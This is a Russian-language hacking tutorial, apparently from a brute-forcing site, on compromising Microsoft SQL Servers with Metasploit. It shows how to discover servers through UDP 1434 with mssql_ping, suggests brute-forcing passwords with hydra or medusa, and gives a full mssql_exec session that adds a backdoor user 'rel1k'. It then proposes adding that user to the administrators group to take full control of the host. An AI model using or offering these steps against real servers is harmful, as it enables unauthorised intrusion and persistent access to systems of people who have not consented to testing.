Охота на MSSQL

Одним из моих предпочтений является тестирование MSSQL серверов. Если вы не пытаетесь взломать сервер изнутри, вам понадобятся инструменты удаленного проникновения. При инсталляции MSSQL ожидает подключений на TCP порту 1433, либо выбирает порт случайным образом. Если порт выбирается случайным образом, для злоумышленника такой исход может вызвать некоторые затруднения с обнаружением цели атаки. К счастью для нас Microsoft в своем сервере используют порт UDP 1434, через который мы получим всю необходимую информацию о сервере, в том числе какой TCP порт прослушивается.
Давайте загрузим модуль и используем его, чтобы обнаружить несколько серверов.

Получаем :

[*] SQL Server information for 10.211.55.128:
[*] tcp = 1433
[*] np = SSHACKTHISBOX-0pipesqlquery
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SSHACKTHISBOX-0
[*] Auxiliary module execution completed

Первой командой мы задали поиск всех 'mssql' плагинов. Второй набор задает инструкцию 'use canner/mssql/mssql_ping', использовать модуль сканирования. Далее 'show options' отображает все необходимые параметры. Параметр 'set RHOSTS 10.211.55.1/24' позволяет задать диапазон подсети сканирования SQL серверов. Вы можете указать любую маску, например /16. Я бы рекомендовал увеличить число потоков, потому как сканирование в один поток может занять очень много времени.
После команды 'exploit' выполняется сканирование с последующим выводом информации о MSSQL сервере. Как видим, имя машины "SSHACKTHISBOX-0", а порт TCP на котором «висит» сервер — 1433. На этом этапе можно попробовать модуль 'scanner/mssql/mssql_login', который может угадать пароль, но этот модуль не поддерживает атаки по словарю. Для перебора «грубой силой» можно попробовать воспользоваться Fast-Track или специализированными утилитами для брута, medusa или hydra. После успешного подбора пароля существует модуль для выполнения команд на удаленном сервере.

msf auxiliary(mssql_exec) > set RHOST 10.211.55.128
RHOST => 10.211.55.128
msf auxiliary(mssql_exec) > set MSSQL_PASS password
MSSQL_PASS => password
msf auxiliary(mssql_exec) > set CMD net user rel1k ihazpassword /ADD
cmd => net user rel1k ihazpassword /ADD
msf auxiliary(mssql_exec) > exploit

The command completed successfully.


[*] Auxiliary module execution completed

Посмотрев выше можно заметить, что строкой 'net user rel1k ihazpassword /ADD' мы добавили пользователя "rel1k", также мы могли бы ввести команду 'net localgroup administrator rel1k /ADD' , чтобы добавить нового пользователя в локальную группу «администраторы» сервера базы данных, тем самым получив полный контроль над системой.

Э_L_A_Y c brutforcer.ru